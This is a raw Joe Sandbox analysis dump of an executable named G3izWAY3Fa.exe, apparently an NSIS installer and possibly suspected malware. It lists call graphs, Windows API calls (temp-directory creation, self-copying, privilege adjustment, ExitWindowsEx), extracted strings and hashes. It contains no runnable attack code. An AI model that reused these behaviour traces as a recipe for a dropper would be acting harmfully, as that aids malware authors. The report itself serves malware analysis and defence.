3043 4054ea lstrcatA 3041->3043 3042->2981 3043->3042 3045 405cf9 3044->3045 3046 405cee FindClose 3044->3046 3045->2986 3046->3045 3048 4052b3 3047->3048 3049 4052ff 3048->3049 3050 4052c7 MessageBoxIndirectA 3048->3050 3049->2998 3050->3049 3052 402ea7 3051->3052 3052->3023 3052->3024 3052->3026 3056 405e1e 3053->3056 3059 405e26 3053->3059 3054 405eb6 GlobalAlloc 3054->3056 3054->3059 3055 405ead GlobalFree 3055->3054 3056->3035 3057 405f24 GlobalFree 3058 405f2d GlobalAlloc 3057->3058 3058->3056 3058->3059 3059->3054 3059->3055 3059->3056 3059->3057 3059->3058 3060->3018 4135 401634 4136 4029f6 18 API calls 4135->4136 4137 40163a 4136->4137 4138 405cd8 2 API calls 4137->4138 4139 401640 4138->4139 4140 401934 4141 4029d9 18 API calls 4140->4141 4142 40193b 4141->4142 4143 4029d9 18 API calls 4142->4143 4144 401945 4143->4144 4145 4029f6 18 API calls 4144->4145 4146 40194e 4145->4146 4147 401961 lstrlenA 4146->4147 4148 40199c 4146->4148 4149 40196b 4147->4149 4149->4148 4153 4059dd lstrcpynA 4149->4153 4151 401985 4151->4148 4152 401992 lstrlenA 4151->4152 4152->4148 4153->4151 4154 4019b5 4155 4029f6 18 API calls 4154->4155 4156 4019bc 4155->4156 4157 4029f6 18 API calls 4156->4157 4158 4019c5 4157->4158 4159 4019cc lstrcmpiA 4158->4159 4160 4019de lstrcmpA 4158->4160 4161 4019d2 4159->4161 4160->4161 4162 4014b7 4163 4014bd 4162->4163 4164 401389 2 API calls 4163->4164 4165 4014c5 4164->4165 4166 404eb9 4167 405065 4166->4167 4168 404eda GetDlgItem GetDlgItem GetDlgItem 4166->4168 4170 405096 4167->4170 4171 40506e GetDlgItem CreateThread CloseHandle 4167->4171 4212 403dc4 SendMessageA 4168->4212 4173 4050c1 4170->4173 4174 4050e3 4170->4174 4175 4050ad ShowWindow ShowWindow 4170->4175 4171->4170 4172 404f4b 4177 404f52 GetClientRect GetSystemMetrics SendMessageA SendMessageA 4172->4177 4176 40511f 4173->4176 4179 4050d2 4173->4179 4180 4050f8 ShowWindow 4173->4180 4181 403df6 8 API calls 4174->4181 4214 403dc4 SendMessageA 4175->4214 4176->4174 4186 40512a SendMessageA 4176->4186 4184 404fc1 4177->4184 4185 404fa5 SendMessageA SendMessageA 4177->4185 4215 403d68 4179->4215 4182 405118 4180->4182 4183 40510a 4180->4183 4193 4050f1 4181->4193 4189 403d68 SendMessageA 4182->4189 4188 404d7b 25 API calls 4183->4188 4190 404fd4 4184->4190 4191 404fc6 SendMessageA 4184->4191 4185->4184 4192 405143 CreatePopupMenu 4186->4192 4186->4193 4188->4182 4189->4176 4195 403d8f 19 API calls 4190->4195 4191->4190 4194 4059ff 18 API calls 4192->4194 4196 405153 AppendMenuA 4194->4196 4197 404fe4 4195->4197 4198 405166 GetWindowRect 4196->4198 4199 405179 4196->4199 4200 405021 GetDlgItem SendMessageA 4197->4200 4201 404fed ShowWindow 4197->4201 4203 405182 TrackPopupMenu 4198->4203 4199->4203 4200->4193 4202 405048 SendMessageA SendMessageA 4200->4202 4204 405010 4201->4204 4205 405003 ShowWindow 4201->4205 4202->4193 4203->4193 4206 4051a0 4203->4206 4213 403dc4 SendMessageA 4204->4213 4205->4204 4207 4051bc SendMessageA 4206->4207 4207->4207 4209 4051d9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4207->4209 4210 4051fb SendMessageA 4209->4210 4210->4210 4211 40521c GlobalUnlock SetClipboardData CloseClipboard 4210->4211 4211->4193 4212->4172 4213->4200 4214->4173 4216 403d75 SendMessageA 4215->4216 4217 403d6f 4215->4217 4216->4174 4217->4216 4218 402b3b 4219 402b63 4218->4219 4220 402b4a SetTimer 4218->4220 4221 402bb8 4219->4221 4222 402b7d MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 4219->4222 4220->4219 4222->4221 4223 4038bc 4224 4038d4 4223->4224 4225 403a0f 4223->4225 4224->4225 4226 4038e0 4224->4226 4227 403a20 GetDlgItem GetDlgItem 4225->4227 4228 403a60 4225->4228 4229 4038eb SetWindowPos 4226->4229 4230 4038fe 4226->4230 4231 403d8f 19 API calls 4227->4231 4232 403aba 4228->4232 4237 401389 2 API calls 4228->4237 4229->4230 4234 403903 ShowWindow 4230->4234 4235 40391b 4230->4235 4236 403a4a SetClassLongA 4231->4236 4233 403ddb SendMessageA 4232->4233 4253 403a0a 4232->4253 4260 403acc 4233->4260 4234->4235 4238 403923 DestroyWindow 4235->4238 4239 40393d 4235->4239 4240 40140b 2 API calls 4236->4240 4241 403a92 4237->4241 4290 403d18 4238->4290 4242 403942 SetWindowLongA 4239->4242 4243 403953 4239->4243 4240->4228 4241->4232 4246 403a96 SendMessageA 4241->4246 4242->4253 4244 4039ca 4243->4244 4245 40395f GetDlgItem 4243->4245 4251 403df6 8 API calls 4244->4251 4249 403972 SendMessageA IsWindowEnabled 4245->4249 4250 40398f 4245->4250 4246->4253 4247 40140b 2 API calls 4247->4260 4248 403d1a DestroyWindow EndDialog 4248->4290 4249->4250 4249->4253 4255 40399c 4250->4255 4256 4039e3 SendMessageA 4250->4256 4257 4039af 4250->4257 4266 403994 4250->4266 4251->4253 4252 403d49 ShowWindow 4252->4253 4254 4059ff 18 API calls 4254->4260 4255->4256 4255->4266 4256->4244 4261 4039b7 4257->4261 4262 4039cc 4257->4262 4258 403d68 SendMessageA 4258->4244 4259 403d8f 19 API calls 4259->4260 4260->4247 4260->4248 4260->4253 4260->4254 4260->4259 4265 403d8f 19 API calls 4260->4265 4281 403c5a DestroyWindow 4260->4281 4264 40140b 2 API calls 4261->4264 4263 40140b 2 API calls 4262->4263 4263->4266 4264->4266 4267 403b47 GetDlgItem 4265->4267 4266->4244 4266->4258 4268 403b64 ShowWindow EnableWindow 4267->4268 4269 403b5c 4267->4269 4291 403db1 EnableWindow 4268->4291 4269->4268 4271 403b8e EnableWindow 4274 403ba2 4271->4274 4272 403ba7 GetSystemMenu EnableMenuItem SendMessageA 4273 403bd7 SendMessageA 4272->4273 4272->4274 4273->4274 4274->4272 4292 403dc4 SendMessageA 4274->4292 4293 4059dd lstrcpynA 4274->4293 4277 403c05 lstrlenA 4278 4059ff 18 API calls 4277->4278 4279 403c16 SetWindowTextA 4278->4279 4280 401389 2 API calls 4279->4280 4280->4260 4282 403c74 CreateDialogParamA 4281->4282 4281->4290 4283 403ca7 4282->4283 4282->4290 4284 403d8f 19 API calls 4283->4284 4285 403cb2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4284->4285 4286 401389 2 API calls 4285->4286 4287 403cf8 4286->4287 4287->4253 4288 403d00 ShowWindow 4287->4288 4289 403ddb SendMessageA 4288->4289 4289->4290 4290->4252 4290->4253 4291->4271 4292->4274 4293->4277 4294 40263e 4295 4029f6 18 API calls 4294->4295 4296 402645 FindFirstFileA 4295->4296 4297 402668 4296->4297 4301 402658 4296->4301 4298 40266f 4297->4298 4302 40593b wsprintfA 4297->4302 4303 4059dd lstrcpynA 4298->4303 4302->4298 4303->4301 4304 4024be 4305 4024c3 4304->4305 4306 4024d4 4304->4306 4307 4029d9 18 API calls 4305->4307 4308 4029f6 18 API calls 4306->4308 4310 4024ca 4307->4310 4309 4024db lstrlenA 4308->4309 4309->4310 4311 4024fa WriteFile 4310->4311 4312 40265c 4310->4312 4311->4312

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 0 4030cb-403160 #17 SetErrorMode OleInitialize call 405cff SHGetFileInfoA call 4059dd GetCommandLineA call 4059dd GetModuleHandleA 7 403162-403167 0->7 8 40316c-403181 call 4054fb CharNextA 0->8 7->8 11 4031e6-4031ea 8->11 12 403183-403186 11->12 13 4031ec 11->13 14 403188-40318c 12->14 15 40318e-403196 12->15 16 4031ff-403217 GetTempPathA call 403097 13->16 14->14 14->15 17 403198-403199 15->17 18 40319e-4031a1 15->18 26 403239-403250 DeleteFileA call 402c22 16->26 27 403219-403237 GetWindowsDirectoryA lstrcatA call 403097 16->27 17->18 20 4031a3-4031a7 18->20 21 4031d6-4031e3 call 4054fb 18->21 24 4031b7-4031bd 20->24 25 4031a9-4031b2 20->25 21->11 38 4031e5 21->38 28 4031cd-4031d4 24->28 29 4031bf-4031c8 24->29 25->24 32 4031b4 25->32 39 4032b7-4032c6 ExitProcess CoUninitialize 26->39 40 403252-403258 26->40 27->26 27->39 28->21 36 4031ee-4031fa call 4059dd 28->36 29->28 35 4031ca 29->35 32->24 35->28 36->16 38->11 44 4033b1-4033b7 39->44 45 4032cc-4032dc call 40529e ExitProcess 39->45 42 4032a7-4032ae call 403526 40->42 43 40325a-403263 call 4054fb 40->43 52 4032b3 42->52 58 40326e-403270 43->58 46 403434-40343c 44->46 47 4033b9-4033d6 call 405cff * 3 44->47 53 403442-403446 ExitProcess 46->53 54 40343e 46->54 74 403420-40342b ExitWindowsEx 47->74 75 4033d8-4033da 47->75 52->39 54->53 60 403272-40327c 58->60 61 403265-40326b 58->61 64 4032e2-4032fc lstrcatA lstrcmpiA 60->64 65 40327e-40328b call 4055b1 60->65 61->60 63 40326d 61->63 63->58 64->39 67 4032fe-403313 CreateDirectoryA SetCurrentDirectoryA 64->67 65->39 77 40328d-4032a3 call 4059dd * 2 65->77 70 403320-40333a call 4059dd 67->70 71 403315-40331b call 4059dd 67->71 83 40333f-40335b call 4059ff DeleteFileA 70->83 71->70 74->46 80 40342d-40342f call 40140b 74->80 75->74 81 4033dc-4033de 75->81 77->42 80->46 81->74 85 4033e0-4033f2 GetCurrentProcess 81->85 91 40339c-4033a3 83->91 92 40335d-40336d CopyFileA 83->92 85->74 93 4033f4-403416 85->93 91->83 95 4033a5-4033ac call 40572b 91->95 92->91 94 40336f-40338f call 40572b call 4059ff call 40523d 92->94 93->74 94->91 105 403391-403398 CloseHandle 94->105 95->39 105->91
                                                                                              APIs
                                                                                              • #17.COMCTL32 ref: 004030EA
                                                                                              • SetErrorMode.KERNELBASE(00008001), ref: 004030F5
                                                                                              • OleInitialize.OLE32(00000000), ref: 004030FC
                                                                                                • Part of subcall function 00405CFF: GetModuleHandleA.KERNEL32(?,?,00000000,0040310E,00000008), ref: 00405D11
                                                                                                • Part of subcall function 00405CFF: LoadLibraryA.KERNELBASE(?,?,00000000,0040310E,00000008), ref: 00405D1C
                                                                                                • Part of subcall function 00405CFF: GetProcAddress.KERNEL32(00000000,?), ref: 00405D2D
                                                                                              • SHGetFileInfoA.SHELL32(0041F430,00000000,?,00000160,00000000,00000008), ref: 00403124
                                                                                                • Part of subcall function 004059DD: lstrcpynA.KERNEL32(?,?,00000400,00403139,00423680,NSIS Error), ref: 004059EA
                                                                                              • GetCommandLineA.KERNEL32(00423680,NSIS Error), ref: 00403139
                                                                                              • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000), ref: 0040314C
                                                                                              • CharNextA.USER32(00000000,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000020), ref: 00403177
                                                                                              • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040320A
                                                                                              • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040321F
                                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040322B
                                                                                              • DeleteFileA.KERNELBASE(1033), ref: 0040323E
                                                                                              • ExitProcess.KERNEL32(00000000), ref: 004032B7
                                                                                              • CoUninitialize.COMBASE(00000000), ref: 004032BC
                                                                                              • ExitProcess.KERNEL32 ref: 004032DC
                                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000,00000000), ref: 004032E8
                                                                                              • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 004032F4
                                                                                              • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403300
                                                                                              • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403307
                                                                                              • DeleteFileA.KERNEL32(0041F030,0041F030,?,00424000,?), ref: 00403351
                                                                                              • CopyFileA.KERNEL32(C:\Users\user\Desktop\G3izWAY3Fa.exe,0041F030,00000001), ref: 00403365
                                                                                              • CloseHandle.KERNEL32(00000000,0041F030,0041F030,?,0041F030,00000000), ref: 00403392
                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 004033E7
                                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 00403423
                                                                                              • ExitProcess.KERNEL32 ref: 00403446
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExitFileProcess$DirectoryHandle$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                              • String ID: /D=$ _?=$"$"C:\Users\user\Desktop\G3izWAY3Fa.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\G3izWAY3Fa.exe$C:\Windows\temp$C:\Windows\temp$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                              • API String ID: 553446912-3967748765
                                                                                              • Opcode ID: dac8a3e4b42874552ff3bf8d63fabb06b1ed44114a57f908459e075a30442c4d
                                                                                              • Instruction ID: cc286ec977d2638fbe9c092aa5ad16f4889e12429ffafd7da1ab197300c5bae6
                                                                                              • Opcode Fuzzy Hash: dac8a3e4b42874552ff3bf8d63fabb06b1ed44114a57f908459e075a30442c4d
                                                                                              • Instruction Fuzzy Hash: 9691B170A08340AED7216F619D49B6B7EACEB0530AF44047FF581B62D2C77C9E458B6E

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 405 405fa8-405fad 406 40601e-40603c 405->406 407 405faf-405fde 405->407 408 406614-406629 406->408 409 405fe0-405fe3 407->409 410 405fe5-405fe9 407->410 412 406643-406659 408->412 413 40662b-406641 408->413 411 405ff5-405ff8 409->411 414 405ff1 410->414 415 405feb-405fef 410->415 417 406016-406019 411->417 418 405ffa-406003 411->418 416 40665c-406663 412->416 413->416 414->411 415->411 419 406665-406669 416->419 420 40668a-406696 416->420 423 4061eb-406209 417->423 421 406005 418->421 422 406008-406014 418->422 426 406818-406822 419->426 427 40666f-406687 419->427 432 405e2c-405e35 420->432 421->422 429 40607e-4060ac 422->429 424 406221-406233 423->424 425 40620b-40621f 423->425 431 406236-406240 424->431 425->431 430 40682e-406841 426->430 427->420 433 4060c8-4060e2 429->433 434 4060ae-4060c6 429->434 440 406846-40684a 430->440 436 406242 431->436 437 4061e3-4061e9 431->437 438 406843 432->438 439 405e3b 432->439 435 4060e5-4060ef 433->435 434->435 442 4060f5 435->442 443 406066-40606c 435->443 444 406353-406360 436->444 445 4061be-4061c2 436->445 437->423 441 406187-406191 437->441 438->440 446 405e42-405e46 439->446 447 405f82-405fa3 439->447 448 405ee7-405eeb 439->448 449 405f57-405f5b 439->449 456 4067d6-4067e0 441->456 457 406197-4061b9 441->457 468 4067b2-4067bc 442->468 469 40604b-406063 442->469 458 406072-406078 443->458 459 40611f-406125 443->459 444->432 460 4063af-4063be 444->460 461 4061c8-4061e0 445->461 462 4067ca-4067d4 445->462 446->430 453 405e4c-405e59 446->453 447->408 451 405ef1-405f0a 448->451 452 406797-4067a1 448->452 454 405f61-405f75 449->454 455 4067a6-4067b0 449->455 463 405f0d-405f11 451->463 452->430 453->438 467 405e5f-405ea5 453->467 466 405f78-405f80 454->466 455->430 456->430 457->444 458->429 464 406183 458->464 459->464 465 406127-406145 459->465 460->408 461->437 462->430 463->448 470 405f13-405f19 463->470 464->441 471 406147-40615b 465->471 472 40615d-40616f 465->472 466->447 466->449 473 405ea7-405eab 467->473 474 405ecd-405ecf 467->474 468->430 469->443 475 405f43-405f55 470->475 476 405f1b-405f22 470->476 477 406172-40617c 471->477 472->477 478 405eb6-405ec4 GlobalAlloc 473->478 479 405ead-405eb0 GlobalFree 473->479 480 405ed1-405edb 474->480 481 405edd-405ee5 474->481 475->466 482 405f24-405f27 GlobalFree 476->482 483 405f2d-405f3d GlobalAlloc 476->483 477->459 484 40617e 477->484 478->438 485 405eca 478->485 479->478 480->480 480->481 481->463 482->483 483->438 483->475 487 406104-40611c 484->487 488 4067be-4067c8 484->488 485->474 487->459 488->430
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9b666163c1661dbd9b8a2e81cbf380ba9933516b4cb578f4d51b52d9bda143bb
                                                                                              • Instruction ID: ffbedf2a53f09e030cb941e21afd419a8c3069ec791793070072d3341ca218b9
                                                                                              • Opcode Fuzzy Hash: 9b666163c1661dbd9b8a2e81cbf380ba9933516b4cb578f4d51b52d9bda143bb
                                                                                              • Instruction Fuzzy Hash: 17F16571D00229CBCF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A86CF44
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(?,?,00000000,0040310E,00000008), ref: 00405D11
                                                                                              • LoadLibraryA.KERNELBASE(?,?,00000000,0040310E,00000008), ref: 00405D1C
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00405D2D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleLibraryLoadModuleProc
                                                                                              • String ID:
                                                                                              • API String ID: 310444273-0
                                                                                              • Opcode ID: 7acfb344228b968400b962badda7c36266698eee5c55508006b44164a923ef80
                                                                                              • Instruction ID: d69b72dbe4010a9b48e4a262f362438d38f190b8a9031efe6831075815a54aa0
                                                                                              • Opcode Fuzzy Hash: 7acfb344228b968400b962badda7c36266698eee5c55508006b44164a923ef80
                                                                                              • Instruction Fuzzy Hash: 5DE08C32A04610BBD3215B20AE0896B73A8EED9B403004C7EF615F6251D734AC11DBBA

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 106 403526-40353e call 405cff 109 403540-403550 call 40593b 106->109 110 403552-403579 call 4058c4 106->110 119 40359c-4035c5 call 4037ef call 4055b1 109->119 115 403591-403597 lstrcatA 110->115 116 40357b-40358c call 4058c4 110->116 115->119 116->115 124 4035cb-4035d0 119->124 125 40364c-403654 call 4055b1 119->125 124->125 126 4035d2-4035f6 call 4058c4 124->126 131 403662-403687 LoadImageA 125->131 132 403656-40365d call 4059ff 125->132 126->125 133 4035f8-4035fa 126->133 135 403716-40371e call 40140b 131->135 136 40368d-4036c3 RegisterClassA 131->136 132->131 137 40360b-403617 lstrlenA 133->137 138 4035fc-403609 call 4054fb 133->138 150 403720-403723 135->150 151 403728-403733 call 4037ef 135->151 139 4037e5 136->139 140 4036c9-403711 SystemParametersInfoA CreateWindowExA 136->140 144 403619-403627 lstrcmpiA 137->144 145 40363f-403647 call 4054d0 call 4059dd 137->145 138->137 142 4037e7-4037ee 139->142 140->135 144->145 149 403629-403633 GetFileAttributesA 144->149 145->125 154 403635-403637 149->154 155 403639-40363a call 405517 149->155 150->142 159 403739-403756 ShowWindow LoadLibraryA 151->159 160 4037bc-4037c4 call 404e4d 151->160 154->145 154->155 155->145 161 403758-40375d LoadLibraryA 159->161 162 40375f-403771 GetClassInfoA 159->162 168 4037c6-4037cc 160->168 169 4037de-4037e0 call 40140b 160->169 161->162 164 403773-403783 GetClassInfoA RegisterClassA 162->164 165 403789-4037ba DialogBoxParamA call 40140b call 403476 162->165 164->165 165->142 168->150 170 4037d2-4037d9 call 40140b 168->170 169->139 170->150
                                                                                              APIs
                                                                                                • Part of subcall function 00405CFF: GetModuleHandleA.KERNEL32(?,?,00000000,0040310E,00000008), ref: 00405D11
                                                                                                • Part of subcall function 00405CFF: LoadLibraryA.KERNELBASE(?,?,00000000,0040310E,00000008), ref: 00405D1C
                                                                                                • Part of subcall function 00405CFF: GetProcAddress.KERNEL32(00000000,?), ref: 00405D2D
                                                                                              • lstrcatA.KERNEL32(1033,00420478,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420478,00000000,00000006,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403597
                                                                                              • lstrlenA.KERNEL32(open C:\Windows\temp\Edit9,?,?,?,open C:\Windows\temp\Edit9,00000000,C:\Windows\temp,1033,00420478,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420478,00000000,00000006,"C:\Users\user\Desktop\G3izWAY3Fa.exe"), ref: 0040360C
                                                                                              • lstrcmpiA.KERNEL32(?,.exe), ref: 0040361F
                                                                                              • GetFileAttributesA.KERNEL32(open C:\Windows\temp\Edit9), ref: 0040362A
                                                                                              • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Windows\temp), ref: 00403673
                                                                                                • Part of subcall function 0040593B: wsprintfA.USER32 ref: 00405948
                                                                                              • RegisterClassA.USER32 ref: 004036BA
                                                                                              • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004036D2
                                                                                              • CreateWindowExA.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 0040370B
                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403741
                                                                                              • LoadLibraryA.KERNEL32(RichEd20), ref: 00403752
                                                                                              • LoadLibraryA.KERNEL32(RichEd32), ref: 0040375D
                                                                                              • GetClassInfoA.USER32(00000000,RichEdit20A,00423620), ref: 0040376D
                                                                                              • GetClassInfoA.USER32(00000000,RichEdit,00423620), ref: 0040377A
                                                                                              • RegisterClassA.USER32(00423620), ref: 00403783
                                                                                              • DialogBoxParamA.USER32(?,00000000,004038BC,00000000), ref: 004037A2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                              • String ID: 6B$"C:\Users\user\Desktop\G3izWAY3Fa.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Windows\temp$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$open C:\Windows\temp\Edit9
                                                                                              • API String ID: 914957316-3617224747
                                                                                              • Opcode ID: ca5c191d662c2f1331136733af7cd9fb3c1208b0aa80a7c8f6e1579a7abb4d19
                                                                                              • Instruction ID: 0f3f48bff709b167bb3a38cee6451da723a784a17f6d38f49bc0c0f1e25ee8dd
                                                                                              • Opcode Fuzzy Hash: ca5c191d662c2f1331136733af7cd9fb3c1208b0aa80a7c8f6e1579a7abb4d19
                                                                                              • Instruction Fuzzy Hash: 9261C5B1A04200BAD6206F659C45E3B3A6DE74474AF40453FF941B62E1D67D9E028B3E

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
